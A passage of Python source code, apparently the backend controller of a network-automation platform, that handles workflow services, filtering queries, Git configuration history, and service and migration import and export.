**instance_properties}\n return results\n\n def clear_results(self, service_id):\n for result in db.fetch(\n \"run\", all_matches=True, allow_none=True, service_id=service_id\n ):\n db.session.delete(result)\n\n def compare(self, type, id, v1, v2, context_lines):\n if type in (\"result\", \"device_result\"):\n first = vs.dict_to_string(getattr(db.fetch(\"result\", id=v1), \"result\"))\n second = vs.dict_to_string(getattr(db.fetch(\"result\", id=v2), \"result\"))\n else:\n device = db.fetch(\"device\", id=id)\n result1 = self.get_git_network_data(device.name, v1)\n result2 = self.get_git_network_data(device.name, v2)\n v1, v2 = result1[\"datetime\"], result2[\"datetime\"]\n first, second = result1[\"result\"][type], result2[\"result\"][type]\n return \"\\n\".join(\n unified_diff(\n first.splitlines(),\n second.splitlines(),\n fromfile=f\"V1 ({v1})\",\n tofile=f\"V2 ({v2})\",\n lineterm=\"\",\n n=int(context_lines),\n )\n )\n\n def copy_service_in_workflow(self, workflow_id, **kwargs):\n service_sets = list(set(kwargs[\"services\"].split(\",\")))\n service_instances = db.objectify(\"service\", service_sets)\n workflow = db.fetch(\"workflow\", id=workflow_id, rbac=\"edit\")\n services, errors, shallow_copy = [], [], kwargs[\"mode\"] == \"shallow\"\n for service in service_instances:\n if shallow_copy and not service.shared:\n errors.append(f\"'{service.name}' is not a shared service.\")\n elif shallow_copy and service in workflow.services:\n errors.append(f\"This workflow already contains '{service.name}'.\")\n elif service.scoped_name == \"Placeholder\" and not shallow_copy:\n errors.append(\"Deep Copy cannot be used for the placeholder service.\")\n if errors:\n return {\"alert\": errors}\n for service in service_instances:\n if kwargs[\"mode\"] == \"deep\":\n service = service.duplicate(workflow)\n else:\n workflow.services.append(service)\n services.append(service)\n workflow.update_last_modified_properties()\n db.session.commit()\n return {\n \"services\": [service.serialized for service in services],\n \"update_time\": workflow.last_modified,\n }\n\n def count_models(self):\n active_service, active_workflow = 0, 0\n for run in db.fetch_all(\"run\", rbac=None, status=\"Running\"):\n active_service += 1\n active_workflow += run.service.type == \"workflow\"\n return {\n \"counters\": {\n model: db.query(model, rbac=None)\n .with_entities(vs.models[model].id)\n .count()\n for model in vs.properties[\"dashboard\"]\n },\n \"active\": {\n \"service\": active_service,\n \"task\": len(db.fetch_all(\"task\", rbac=None, is_active=True)),\n \"workflow\": active_workflow,\n },\n \"properties\": {\n model: self.counters(vs.properties[\"dashboard\"][model][0], model)\n for model in vs.properties[\"dashboard\"]\n },\n }\n\n def counters(self, property, model):\n return Counter(v for v, in db.query(model, properties=[property], rbac=None))\n\n def create_label(self, type, id, x, y, label_id, **kwargs):\n workflow = db.fetch(type, id=id, rbac=\"edit\")\n label_id = str(uuid4()) if label_id == \"undefined\" else label_id\n label = {\n \"positions\": [x, y],\n \"content\": kwargs[\"text\"],\n \"alignment\": kwargs[\"alignment\"],\n \"size\": kwargs[\"size\"],\n }\n workflow.labels[label_id] = label\n return {\"id\": label_id, **label}\n\n def database_deletion(self, **kwargs):\n db.delete_all(*kwargs[\"deletion_types\"])\n\n def delete_instance(self, model, instance_id):\n try:\n return db.delete(model, id=instance_id)\n except Exception as exc:\n return {\"alert\": f\"Unable to delete {model} ({exc})\"}\n\n def delete_builder_selection(self, type, id, **selection):\n instance = db.fetch(type, id=id)\n instance.update_last_modified_properties()\n instance.check_restriction_to_owners(\"edit\")\n for edge_id in selection[\"edges\"]:\n if type == \"workflow\":\n db.delete(\"workflow_edge\", id=edge_id)\n else:\n instance.links.remove(db.fetch(\"link\", id=edge_id))\n for node_id in selection[\"nodes\"]:\n if isinstance(node_id, str):\n instance.labels.pop(node_id)\n elif type == \"network\":\n instance.nodes.remove(db.fetch(\"node\", id=node_id))\n else:\n service = db.fetch(\"service\", rbac=\"edit\", id=node_id)\n if not service.shared:\n db.delete_instance(service)\n else:\n instance.services.remove(service)\n return instance.last_modified\n\n def edit_file(self, filepath):\n scoped_path = filepath.replace(\">\", \"/\")\n try:\n with open(f\"{vs.file_path}{scoped_path}\") as file:\n return file.read()\n except FileNotFoundError:\n file = db.fetch(\"file\", path=scoped_path, allow_none=True)\n if file:\n file.status = \"Not Found\"\n return {\"error\": \"File not found on disk.\"}\n except UnicodeDecodeError:\n return {\"error\": \"Cannot read file (unsupported type).\"}\n\n def export_service(self, service_id):\n service = db.fetch(\"service\", id=service_id)\n path = Path(vs.path / \"files\" / \"services\" / service.filename)\n path.mkdir(parents=True, exist_ok=True)\n services = (\n set(service.deep_services) if service.type == \"workflow\" else [service]\n )\n exclude = (\"target_devices\", \"target_pools\", \"pools\", \"events\")\n services = [\n service.to_dict(export=True, private_properties=True, exclude=exclude)\n for service in services\n ]\n with open(path / \"service.yaml\", \"w\") as file:\n yaml.dump(services, file, default_style='\"')\n if service.type == \"workflow\":\n edges = [edge.to_dict(export=True) for edge in service.deep_edges]\n with open(path / \"workflow_edge.yaml\", \"w\") as file:\n yaml.dump(edges, file, default_style='\"')\n with open(path / \"metadata.yaml\", \"w\") as file:\n metadata = {\n \"version\": vs.server_version,\n \"export_time\": datetime.now(),\n \"service\": service.name,\n }\n yaml.dump(metadata, file)\n with open_tar(f\"{path}.tgz\", \"w:gz\") as tar:\n tar.add(path, arcname=service.filename)\n rmtree(path, ignore_errors=True)\n return path\n\n def export_services(self, **kwargs):\n if kwargs[\"parent-filtering\"] == \"true\":\n kwargs[\"workflows_filter\"] = \"empty\"\n for service in self.filtering(\"service\", properties=[\"id\"], form=kwargs):\n self.export_service(service.id)\n\n def filtering_base_constraints(self, model, **kwargs):\n table, constraints = vs.models[model], []\n constraint_dict = {**kwargs.get(\"form\", {}), **kwargs.get(\"constraints\", {})}\n for property in vs.model_properties[model]:\n value, row = constraint_dict.get(property), getattr(table, property)\n filter_value = constraint_dict.get(f\"{property}_filter\")\n if not value and filter_value != \"empty\":\n continue\n if value in (\"bool-true\", \"bool-false\"):\n constraint = row == (value == \"bool-true\")\n elif filter_value == \"equality\":\n constraint = row == value\n elif filter_value == \"empty\":\n constraint = row == \"\"\n elif not filter_value or filter_value == \"inclusion\":\n constraint = row.contains(value, autoescape=isinstance(value, str))\n else:\n constraint = cast(row, String()).regexp_match(value)\n if constraint_dict.get(f\"{property}_invert\"):\n constraint = ~constraint\n constraints.append(constraint)\n return constraints\n\n def filtering_relationship_constraints(self, query, model, **kwargs):\n table = vs.models[model]\n constraint_dict = {**kwargs.get(\"form\", {}), **kwargs.get(\"constraints\", {})}\n for related_model, relation_properties in vs.relationships[model].items():\n related_table = aliased(vs.models[relation_properties[\"model\"]])\n match = constraint_dict.get(f\"{related_model}_filter\")\n if match == \"empty\":\n query = query.filter(~getattr(table, related_model).any())\n else:\n relation_names = constraint_dict.get(related_model, [])\n if not relation_names:\n continue\n if match == \"union\":\n query = (\n query.join(related_table, getattr(table, related_model))\n .filter(related_table.name.in_(relation_names))\n .group_by(table.id)\n )\n else:\n for name in relation_names:\n new_table = aliased(vs.models[relation_properties[\"model\"]])\n query = query.join(\n new_table, getattr(table, related_model)\n ).filter(new_table.name == name)\n if constraint_dict.get(\"intersect\"):\n intersect_model = constraint_dict[\"intersect\"][\"type\"]\n intersect_table = aliased(vs.models[intersect_model])\n query = query.join(\n intersect_table, getattr(table, f\"{intersect_model}s\")\n ).filter(intersect_table.id == constraint_dict[\"intersect\"][\"id\"])\n return query\n\n def filtering(\n self, model, bulk=False, rbac=\"read\", username=None, properties=None, **kwargs\n ):\n table, pagination = vs.models[model], kwargs.get(\"pagination\")\n query = db.query(model, rbac, username, properties=properties)\n total_records, filtered_records = (10**6,) * 2\n if pagination and not bulk and not properties:\n total_records = query.with_entities(table.id).count()\n constraints = self.filtering_base_constraints(model, **kwargs)\n constraints.extend(table.filtering_constraints(**kwargs))\n query = self.filtering_relationship_constraints(query, model, **kwargs)\n query = query.filter(and_(*constraints))\n if bulk or properties:\n instances = query.all()\n if bulk == \"object\" or properties:\n return instances\n else:\n return [getattr(instance, bulk) for instance in instances]\n if pagination:\n filtered_records = query.with_entities(table.id).count()\n data = kwargs[\"columns\"][int(kwargs[\"order\"][0][\"column\"])][\"data\"]\n ordering = getattr(getattr(table, data, None), kwargs[\"order\"][0][\"dir\"], None)\n if ordering:\n query = query.order_by(ordering())\n try:\n query_data = (\n query.limit(int(kwargs[\"length\"])).offset(int(kwargs[\"start\"])).all()\n )\n except OperationalError:\n return {\"error\": \"Invalid regular expression as search parameter.\"}\n table_result = {\n \"draw\": int(kwargs[\"draw\"]),\n \"recordsTotal\": total_records,\n \"recordsFiltered\": filtered_records,\n \"data\": [obj.table_properties(**kwargs) for obj in query_data],\n }\n if kwargs.get(\"export\"):\n table_result[\"full_result\"] = [\n obj.table_properties(**kwargs) for obj in query.all()\n ]\n if kwargs.get(\"clipboard\"):\n table_result[\"full_result\"] = \",\".join(obj.name for obj in query.all())\n return table_result\n\n def get(self, model, id, **kwargs):\n if not kwargs:\n get_model = (\n \"service\" if model == \"workflow\" or \"service\" in model else model\n )\n kwargs = vs.properties[\"serialized\"][\"get\"].get(get_model, {})\n func = \"get_properties\" if kwargs.pop(\"properties_only\", None) else \"to_dict\"\n return getattr(db.fetch(model, id=id), func)(**kwargs)\n\n def get_cluster_status(self):\n return [server.status for server in db.fetch_all(\"server\")]\n\n def get_credentials(self, device, optional=False, **kwargs):\n if kwargs[\"credentials\"] == \"device\":\n credentials = db.get_credential(\n current_user.name, device=device, optional=optional\n )\n if not credentials:\n return\n return credentials.username, env.get_password(credentials.password)\n else:\n return kwargs[\"username\"], kwargs[\"password\"]\n\n def get_device_logs(self, device_id):\n device_logs = [\n log.name\n for log in db.fetch_all(\"log\")\n if log.source == db.fetch(\"device\", id=device_id).ip_address\n ]\n return \"\\n\".join(device_logs)\n\n def get_device_network_data(self, device_id):\n device = db.fetch(\"device\", id=device_id, rbac=\"configuration\")\n return {\n property: vs.custom.parse_configuration_property(device, property)\n for property in vs.configuration_properties\n }\n\n def get_form_properties(self, service_id):\n form_factory.register_parameterized_form(service_id)\n return vs.form_properties[f\"initial-{service_id}\"]\n\n def get_git_content(self, force_update=False):\n env.log(\"info\", \"Starting Git Content Update\")\n repo = vs.settings[\"app\"][\"git_repository\"]\n if not repo:\n return\n local_path = vs.path / \"network_data\"\n try:\n if exists(local_path):\n Repo(local_path).remotes.origin.pull()\n else:\n local_path.mkdir(parents=True, exist_ok=True)\n Repo.clone_from(repo, local_path)\n except Exception as exc:\n env.log(\"error\", f\"Git pull failed ({str(exc)})\")\n try:\n self.update_database_configurations_from_git(force_update)\n except Exception as exc:\n env.log(\"error\", f\"Update of device configurations failed ({str(exc)})\")\n env.log(\"info\", \"Git Content Update Successful\")\n\n def get_git_history(self, device_id):\n device = db.fetch(\"device\", id=device_id, rbac=\"configuration\")\n repo = Repo(vs.path / \"network_data\")\n path = vs.path / \"network_data\" / device.name\n return {\n data_type: [\n {\"hash\": str(commit), \"date\": commit.committed_datetime}\n for commit in list(repo.iter_commits(paths=path / data_type))\n ]\n for data_type in vs.configuration_properties\n }\n\n def get_git_network_data(self, device_name, hash):\n commit, result = Repo(vs.path / \"network_data\").commit(hash), {}\n device = db.fetch(\"device\", name=device_name, rbac=\"configuration\")\n for property in vs.configuration_properties:\n try:\n file = commit.tree / device_name / property\n with BytesIO(file.data_stream.read()) as f:\n value = f.read().decode(\"utf-8\")\n result[property] = vs.custom.parse_configuration_property(\n device, property, value\n )\n except KeyError:\n result[property] = \"\"\n return {\"result\": result, \"datetime\": commit.committed_datetime}\n\n def get_migration_folders(self):\n return listdir(Path(vs.migration_path))\n\n def get_properties(self, model, id):\n return db.fetch(model, id=id).get_properties()\n\n def get_report(self, service_id, runtime):\n return getattr(\n db.fetch(\n \"service_report\",\n allow_none=True,\n runtime=runtime,\n service_id=service_id,\n ),\n \"content\",\n \"\",\n )\n\n def get_report_template(self, template):\n return vs.reports[template]\n\n def get_result(self, id):\n return db.fetch(\"result\", id=id).result\n\n def get_runtimes(self, id, display=None):\n service_alias = aliased(vs.models[\"service\"])\n query = (\n db.query(\"run\", properties=[\"runtime\"])\n .join(service_alias, vs.models[\"run\"].services)\n .filter(service_alias.id == id)\n )\n if display == \"user\":\n query = query.filter(vs.models[\"run\"].creator == current_user.name)\n return sorted(((run.runtime, run.runtime) for run in query.all()), reverse=True)\n\n def get_service_logs(self, service, runtime, line=0, device=None):\n log_instance = db.fetch(\n \"service_log\", allow_none=True, runtime=runtime, service_id=service\n )\n number_of_lines = 0\n if log_instance:\n lines = log_instance.content.splitlines()\n else:\n lines = (\n env.log_queue(runtime, service, start_line=int(line), mode=\"get\") or []\n )\n number_of_lines = len(lines)\n if device:\n device_name = db.fetch(\"device\", id=device).name\n lines = [line for line in lines if f\"DEVICE {device_name}\" in line]\n return {\n \"logs\": \"\\n\".join(lines),\n \"refresh\": not log_instance,\n \"line\": int(line) + number_of_lines,\n }\n\n def get_service_state(self, path, **kwargs):\n state, run, path_id = None, None, path.split(\">\")\n runtime, display = kwargs.get(\"runtime\"), kwargs.get(\"display\")\n output = {\"runtime\": runtime}\n service = db.fetch(\"service\", id=path_id[-1], allow_none=True)\n if not service:\n raise db.rbac_error\n runs = db.query(\"run\", rbac=None).filter(\n vs.models[\"run\"].service_id.in_(path_id)\n )\n if display == \"user\":\n runs = runs.filter(vs.models[\"run\"].creator == current_user.name)\n runs = runs.all()\n if runtime != \"normal\" and runs:\n if runtime == \"latest\":\n run = sorted(runs, key=attrgetter(\"runtime\"), reverse=True)[0]\n else:\n run = db.fetch(\"run\", allow_none=True, runtime=runtime)\n state = run.get_state() if run else None\n if kwargs.get(\"device\") and run:\n output[\"device_state\"] = {\n result.service_id: result.success\n for result in db.fetch_all(\n \"result\", parent_runtime=run.runtime, device_id=kwargs.get(\"device\")\n )\n }\n serialized_service = service.to_dict(include=[\"edges\", \"superworkflow\"])\n run_properties = vs.automation[\"workflow\"][\"state_properties\"][\"run\"]\n service_properties = vs.automation[\"workflow\"][\"state_properties\"][\"service\"]\n if service.type == \"workflow\":\n serialized_service[\"services\"] = []\n for subservice in service.services:\n properties = subservice.get_properties(include=service_properties)\n subservice_positions = subservice.positions.get(service.name, [0, 0])\n properties[\"x\"], properties[\"y\"] = subservice_positions\n serialized_service[\"services\"].append(properties)\n return {\n \"service\": serialized_service,\n \"runtimes\": sorted(\n set((run.runtime, run.name) for run in runs), reverse=True\n ),\n \"state\": state,\n \"run\": run.get_properties(include=run_properties) if run else None,\n **output,\n }\n\n def get_session_log(self, session_id):\n return db.fetch(\"session\", id=session_id).content\n\n def get_network_state(self, path, runtime=None):\n network = db.fetch(\"network\", id=path.split(\">\")[-1], allow_none=True)\n if not network:\n raise db.rbac_error\n return {\n \"network\": network.to_dict(include=[\"nodes\", \"links\"]),\n \"device_results\": {\n result.device_id: result.success\n for result in db.fetch_all(\"result\", parent_runtime=runtime)\n if result.device_id\n },\n }\n\n def get_top_level_instances(self, type):\n result = defaultdict(list)\n constraints = [~getattr(vs.models[type], f\"{type}s\").any()]\n if type == \"workflow\":\n constraints.append(vs.models[type].shared == true())\n properties = [\"id\", \"category\", \"name\"]\n for instance in (\n db.query(type, properties=properties).filter(or_(*constraints)).all()\n ):\n entry = dict(zip(properties, instance))\n result[instance.category or \"Other\"].append(entry)\n return result\n\n def scan_folder(self, path=\"\"):\n env.log(\"info\", \"Starting Scan of Files\")\n path = f\"{vs.file_path}{path.replace('>', '/')}\"\n if not exists(path):\n return {\"alert\": \"This folder does not exist on the filesystem.\"}\n folders = {Path(path)}\n files_set = {\n file\n for file in db.session.query(vs.models[\"file\"])\n .filter(vs.models[\"file\"].full_path.startswith(path))\n .all()\n }\n for file in files_set:\n if not exists(file.full_path):\n file.status = \"Not Found\"\n file_path_set = {file.full_path for file in files_set}\n while folders:\n folder = folders.pop()\n for file in folder.iterdir():\n if str(file) in file_path_set:\n continue\n elif file.suffix in vs.settings[\"files\"][\"ignored_types\"]:\n continue\n elif file.is_dir():\n folders.add(file)\n scoped_path = str(file).replace(str(vs.file_path), \"\")\n db.factory(\"folder\" if file.is_dir() else \"file\", path=scoped_path)\n db.session.commit()\n env.log(\"info\", \"Scan of Files Successful\")\n\n def get_visualization_pools(self, view):\n has_device = vs.models[\"pool\"].devices.any()\n has_link = vs.models[\"pool\"].links.any()\n pools = db.query(\"pool\").filter(or_(has_device, has_link)).all()\n return [pool.base_properties for pool in pools]\n\n def get_workflow_results(self, path, runtime):\n run = db.fetch(\"run\", runtime=runtime)\n service = db.fetch(\"service\", id=path.split(\">\")[-1])\n state = run.state\n\n def rec(service, path):\n if path not in state:\n return\n progress = state[path].get(\"progress\")\n track_progress = progress and progress[\"device\"][\"total\"]\n data = {\"progress\": progress[\"device\"]} if track_progress else {}\n color = \"32CD32\" if state[path][\"result\"][\"success\"] else \"FF6666\"\n result = {\n \"runtime\": state[path][\"result\"][\"runtime\"],\n \"data\": {\"properties\": service.base_properties, **data},\n \"text\": service.scoped_name,\n \"a_attr\": {\"style\": f\"color: #{color};width: 100%\"},\n }\n if service.type == \"workflow\":\n children_results = []\n for child in service.services:\n if child.scoped_name == \"Placeholder\":\n child = run.placeholder\n child_results = rec(child, f\"{path}>{child.id}\")\n if not child_results:\n continue\n children_results.append(child_results)\n return {\n \"children\": sorted(children_results, key=itemgetter(\"runtime\")),\n **result,\n }\n else:\n return result\n\n return rec(service, path)\n\n def get_workflow_services(self, id, node):\n parents = db.fetch(\"workflow\", id=id).get_ancestors()\n if node == \"all\":\n workflows = self.filtering(\n \"workflow\", bulk=\"object\", constraints={\"workflows_filter\": \"empty\"}\n )\n return (\n [\n {\n \"data\": {\"id\": \"standalone\"},\n \"id\": \"standalone\",\n \"text\": \"Standalone services\",\n \"children\": True,\n \"state\": {\"disabled\": True},\n \"a_attr\": {\n \"class\": \"no_checkbox\",\n \"style\": \"color: #000000; width: 100%\",\n },\n \"type\": \"category\",\n }\n ]\n + [\n {\n \"data\": {\"id\": \"shared\"},\n \"id\": \"shared\",\n \"text\": \"Shared services\",\n \"children\": True,\n \"state\": {\"disabled\": True},\n \"a_attr\": {\n \"class\": \"no_checkbox\",\n \"style\": \"color: #FF1694; width: 100%\",\n },\n \"type\": \"category\",\n }\n ]\n + sorted(\n (\n {\n \"id\": workflow.name,\n \"data\": {\"id\": workflow.id},\n \"text\": workflow.name,\n \"children\": True,\n \"type\": \"workflow\",\n \"state\": {\"disabled\": workflow in parents},\n \"a_attr\": {\n \"class\": \"no_checkbox\" if workflow in parents else \"\",\n \"style\": \"color: #6666FF; width: 100%\",\n },\n }\n for workflow in workflows\n ),\n key=itemgetter(\"text\"),\n )\n )\n elif node == \"standalone\":\n constraints = {\"workflows_filter\": \"empty\", \"type\": \"service\"}\n services = self.filtering(\"service\", bulk=\"object\", constraints=constraints)\n return sorted(\n (\n {\n \"data\": {\"id\": service.id},\n \"text\": service.scoped_name,\n \"a_attr\": {\"style\": (\"color: #6666FF;\" \"width: 100%\")},\n }\n for service in services\n ),\n key=itemgetter(\"text\"),\n )\n elif node == \"shared\":\n constraints = {\"shared\": \"bool-true\"}\n services = self.filtering(\"service\", bulk=\"object\", constraints=constraints)\n return sorted(\n (\n {\n \"data\": {\"id\": service.id},\n \"text\": service.scoped_name,\n \"a_attr\": {\"style\": (\"color: #FF1694;\" \"width: 100%\")},\n }\n for service in services\n if service.scoped_name not in (\"Start\", \"End\")\n ),\n key=itemgetter(\"text\"),\n )\n else:\n return sorted(\n (\n {\n \"data\": {\"id\": service.id},\n \"text\": service.scoped_name,\n \"children\": service.type == \"workflow\",\n \"type\": \"workflow\" if service.type == \"workflow\" else \"service\",\n \"state\": {\"disabled\": service in parents},\n \"a_attr\": {\n \"class\": \"no_checkbox\" if service in parents else \"\",\n \"style\": (\n f\"color: #{'FF1694' if service.shared else '6666FF'};\"\n \"width: 100%\"\n ),\n },\n }\n for service in db.fetch(\"workflow\", id=node).services\n if service.scoped_name not in (\"Start\", \"End\")\n ),\n key=itemgetter(\"text\"),\n )\n\n def get_instance_tree(self, type, full_path):\n path_id = full_path.split(\">\")\n\n def rec(instance, path=\"\"):\n path += \">\" * bool(path) + str(instance.id)\n if type == \"workflow\":\n if instance.scoped_name in (\"Start\", \"End\"):\n return\n elif instance.scoped_name == \"Placeholder\" and len(path_id) > 1:\n instance = db.fetch(type, id=path_id[1])\n child_property = \"nodes\" if type == \"network\" else \"services\"\n color = \"FF1694\" if getattr(instance, \"shared\", False) else \"6666FF\"\n return {\n \"data\": {\"path\": path, **instance.base_properties},\n \"id\": instance.id,\n \"state\": {\"opened\": full_path.startswith(path)},\n \"text\": instance.scoped_name if type == \"workflow\" else instance.name,\n \"children\": sorted(\n filter(\n None,\n [\n rec(child, path)\n for child in getattr(instance, child_property)\n ],\n ),\n key=lambda node: node[\"text\"].lower(),\n )\n if instance.type == type\n else False,\n \"a_attr\": {\n \"class\": \"no_checkbox\",\n \"style\": f\"color: #{color}; width: 100%\",\n },\n \"type\": instance.type,\n }\n\n return rec(db.fetch(type, id=path_id[0]))\n\n def load_debug_snippets(self):\n snippets = {}\n for path in Path(vs.file_path / \"snippets\").glob(\"**/*.py\"):\n with open(path, \"r\") as file:\n snippets[path.name] = file.read()\n return snippets\n\n def migration_export(self, **kwargs):\n for cls_name in kwargs[\"import_export_types\"]:\n path = Path(vs.migration_path) / kwargs[\"name\"]\n if not exists(path):\n makedirs(path)\n with open(path / f\"{cls_name}.yaml\", \"w\") as migration_file:\n yaml.dump(\n db.export(\n cls_name,\n private_properties=kwargs[\"export_private_properties\"],\n ),\n migration_file,\n default_style='\"',\n )\n with open(path / \"metadata.yaml\", \"w\") as file:\n yaml.dump(\n {\n \"version\": vs.server_version,\n \"export_time\": datetime.now(),\n },\n file,\n )\n\n def migration_import(self, folder=\"migrations\", **kwargs):\n env.log(\"info\", \"Starting Migration Import\")\n env.log_events = False\n status, models = \"Import successful\", kwargs[\"import_export_types\"]\n empty_database = kwargs.get(\"empty_database_before_import\", False)\n service_import = kwargs.get(\"service_import\", False)\n if empty_database:\n db.delete_all(*models)\n relations, store = defaultdict(lambda: defaultdict(dict)), defaultdict(dict)\n start_time = datetime.now()\n folder_path = (\n Path(vs.migration_path) / kwargs[\"name\"]\n if folder == \"migrations\"\n else vs.file_path / folder / kwargs[\"name\"]\n )\n with open(folder_path / \"metadata.yaml\", \"r\") as metadata_file:\n metadata = yaml.load(metadata_file, Loader=yaml.SafeLoader)\n if service_import and metadata[\"version\"] != vs.server_version:\n return {\"alert\": \"Import from an older version is not allowed\"}\n if current_user:\n store[\"user\"][current_user.name] = current_user\n for service_name in (\"Start\", \"End\", \"Placeholder\"):\n service = db.fetch(\n \"service\", name=f\"[Shared] {service_name}\", allow_none=True\n )\n if service:\n store[\"swiss_army_knife_service\"][service.name] = service\n store[\"service\"][service.name] = service\n for model in models:\n path = folder_path / f\"{model}.yaml\"\n if not path.exists():\n if service_import and model == \"service\":\n raise Exception(\"Invalid archive provided in service import.\")\n continue\n with open(path, \"r\") as migration_file:\n instances = yaml.load(migration_file, Loader=yaml.CLoader)\n before_time = datetime.now()\n env.log(\"info\", f\"Creating {model}s\")\n for instance in instances:\n type, relation_dict = instance.pop(\"type\", model), {}\n for related_model, relation in vs.relationships[type].items():\n relation_dict[related_model] = instance.pop(related_model, [])\n instance_private_properties = {\n property: env.get_password(instance.pop(property))\n for property in list(instance)\n if property in vs.private_properties_set\n }\n try:\n if instance[\"name\"] in store[model]:\n instance = store[model][instance[\"name\"]]\n else:\n instance = db.factory(\n type,\n migration_import=True,\n no_fetch=empty_database,\n import_mechanism=True,\n **instance,\n )\n store[model][instance.name] = instance\n store[type][instance.name] = store[model][instance.name]\n if model in (\"device\", \"network\"):\n store[\"node\"][instance.name] = store[model][instance.name]\n if service_import:\n if instance.type == \"workflow\":\n instance.edges = []\n relations[type][instance.name] = relation_dict\n for property in instance_private_properties.items():\n setattr(instance, *property)\n except Exception:\n info(f\"{str(instance)} could not be imported:\\n{format_exc()}\")\n if service_import:\n db.session.rollback()\n return \"Error during import; service was not imported.\"\n status = {\"alert\": \"partial import (see logs).\"}\n db.session.commit()\n total_time = datetime.now() - before_time\n env.log(\"info\", f\"{model.capitalize()}s created in {total_time}\")\n for model, instances in relations.items():\n env.log(\"info\", f\"Setting up {model}s database relationships\")\n before_time = datetime.now()\n for instance_name, related_models in instances.items():\n for property, value in related_models.items():\n if not value:\n continue\n relation = vs.relationships[model][property]\n if relation[\"list\"]:\n sql_value = []\n for name in value:\n if name not in store[relation[\"model\"]]:\n related_instance = db.fetch(\n relation[\"model\"], name=name, allow_none=True\n )\n if related_instance:\n store[relation[\"model\"]][name] = related_instance\n if name in store[relation[\"model\"]]:\n sql_value.append(store[relation[\"model\"]][name])\n else:\n if value not in store[relation[\"model\"]]:\n related_instance = db.fetch(\n relation[\"model\"], name=value, allow_none=True\n )\n if related_instance:\n store[relation[\"model\"]][value] = related_instance\n sql_value = store[relation[\"model\"]][value]\n try:\n setattr(store[model].get(instance_name), property, sql_value)\n except Exception:\n info(\"\\n\".join(format_exc().splitlines()))\n if service_import:\n db.session.rollback()\n return \"Error during import; service was not imported.\"\n status = {\"alert\": \"Partial Import (see logs).\"}\n env.log(\"info\", f\"Relationships created in {datetime.now() - before_time}\")\n db.session.commit()\n if service_import:\n service = store[\"service\"][metadata[\"service\"]]\n if service.type == \"workflow\":\n service.recursive_update()\n if not kwargs.get(\"skip_model_update\"):\n before_time = datetime.now()\n env.log(\"info\", \"Starting model update\")\n for model in (\"user\", \"service\", \"network\"):\n for instance in store[model].values():\n instance.post_update()\n env.log(\"info\", f\"Model update done ({datetime.now() - before_time}s)\")\n if not kwargs.get(\"skip_pool_update\"):\n before_time = datetime.now()\n env.log(\"info\", \"Starting pool update\")\n for pool in store[\"pool\"].values():\n pool.compute_pool()\n env.log(\"info\", f\"Pool update done ({datetime.now() - before_time}s)\")\n db.session.commit()\n env.log_events = True\n env.log(\"info\", f\"{status} (execution time: {datetime.now() - start_time}s)\")\n return status\n\n def multiselect_filtering(self, model, **params):\n table = vs.models[model]\n query = db.query(model).filter(table.name.contains(params.get(\"term\")))\n query = self.filtering_relationship_constraints(query, model, **params)\n query = query.filter(and_(*self.filtering_base_constraints(model, **params)))\n property = \"name\" if params[\"multiple\"] else \"id\"\n button_html = \"type='button' class='btn btn-link btn-select2'\"\n return {\n \"items\": [\n {\n \"text\": f\"\",\n \"id\": getattr(result, property),\n }\n for result in query.limit(10)\n .offset((int(params[\"page\"]) - 1) * 10)\n .all()\n ],\n \"total_count\": query.count(),\n }\n\n def import_services(self, **kwargs):\n file = kwargs[\"file\"]\n filepath = vs.file_path / \"services\" / file.filename\n (vs.file_path / \"services\").mkdir(parents=True, exist_ok=True)\n file.save(str(filepath))\n with open_tar(filepath) as tar_file:\n tar_file.extractall(path=vs.file_path / \"services\")\n folder_name = tar_file.getmembers()[0].name\n status = self.migration_import(\n folder=\"services\",\n name=folder_name,\n import_export_types=[\"service\", \"workflow_edge\"],\n service_import=True,\n skip_pool_update=True,\n skip_model_update=True,\n )\n rmtree(vs.file_path / \"services\" / folder_name, ignore_errors=True)\n if \"Error during import\" in status:\n raise Exception(status)\n return status\n\n def import_topology(self, **kwargs):\n file = kwargs[\"file\"]\n if kwargs[\"replace\"]:\n db.delete_all(\"device\")\n result = self.topology_import(file)\n info(\"Inventory import: Done.\")\n return result\n\n def objectify(self, model, instance):\n for property, relation in vs.relationships[model].items():\n if property not in instance:\n continue\n elif relation[\"list\"]:\n instance[property] = [\n db.fetch(relation[\"model\"], name=name).id\n for name in instance[property]\n ]\n else:\n instance[property] = db.fetch(\n relation[\"model\"], name=instance[property]\n ).id\n return instance\n\n def remove_instance(self, **kwargs):\n instance = db.fetch(kwargs[\"instance\"][\"type\"], id=kwargs[\"instance\"][\"id\"])\n target = db.fetch(kwargs[\"relation\"][\"type\"], id=kwargs[\"relation\"][\"id\"])\n if target.type == \"pool\" and not target.manually_defined:\n return {\"alert\": \"Removing an object from a dynamic pool is an allowed.\"}\n relationship_property = getattr(target, kwargs[\"relation\"][\"relation\"][\"to\"])\n if instance in relationship_property:\n relationship_property.remove(instance)\n else:\n return {\"alert\": f\"{instance.name} is not associated with {target.name}.\"}\n\n def result_log_deletion(self, **kwargs):\n date_time_object = datetime.strptime(kwargs[\"date_time\"], \"%d/%m/%Y %H:%M:%S\")\n date_time_string = date_time_object.strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n for model in kwargs[\"deletion_types\"]:\n if model == \"run\":\n field_name = \"runtime\"\n elif model == \"changelog\":\n field_name = \"time\"\n session_query = db.session.query(vs.models[model]).filter(\n getattr(vs.models[model], field_name) < date_time_string\n )\n session_query.delete(synchronize_session=False)\n db.session.commit()\n\n @staticmethod\n @actor(max_retries=0, time_limit=float(\"inf\"))\n def run(service, **kwargs):\n current_thread().name = kwargs[\"runtime\"]\n if \"path\" not in kwargs:\n kwargs[\"path\"] = str(service)\n keys = list(vs.model_properties[\"run\"]) + list(vs.relationships[\"run\"])\n run_kwargs = {key: kwargs.pop(key) for key in keys if kwargs.get(key)}\n for property in (\"name\", \"labels\"):\n if property in kwargs.get(\"form\", {}):\n run_kwargs[property] = kwargs[\"form\"][property]\n service = db.fetch(\"service\", id=service, rbac=\"run\")\n service.status = \"Running\"\n initial_payload = {\n **service.initial_payload,\n **kwargs.get(\"form\", {}).get(\"initial_payload\", {}),\n }\n restart_runtime = kwargs.get(\"restart_runtime\")\n restart_run = db.fetch(\"run\", allow_none=True, runtime=restart_runtime)\n if service.type == \"workflow\" and service.superworkflow and not restart_run:\n run_kwargs[\"placeholder\"] = run_kwargs[\"start_service\"] = service.id\n run_kwargs[\"path\"] = str(service.superworkflow.id)\n service = service.superworkflow\n initial_payload.update(service.initial_payload)\n else:\n run_kwargs[\"start_service\"] = service.id\n if restart_run:\n 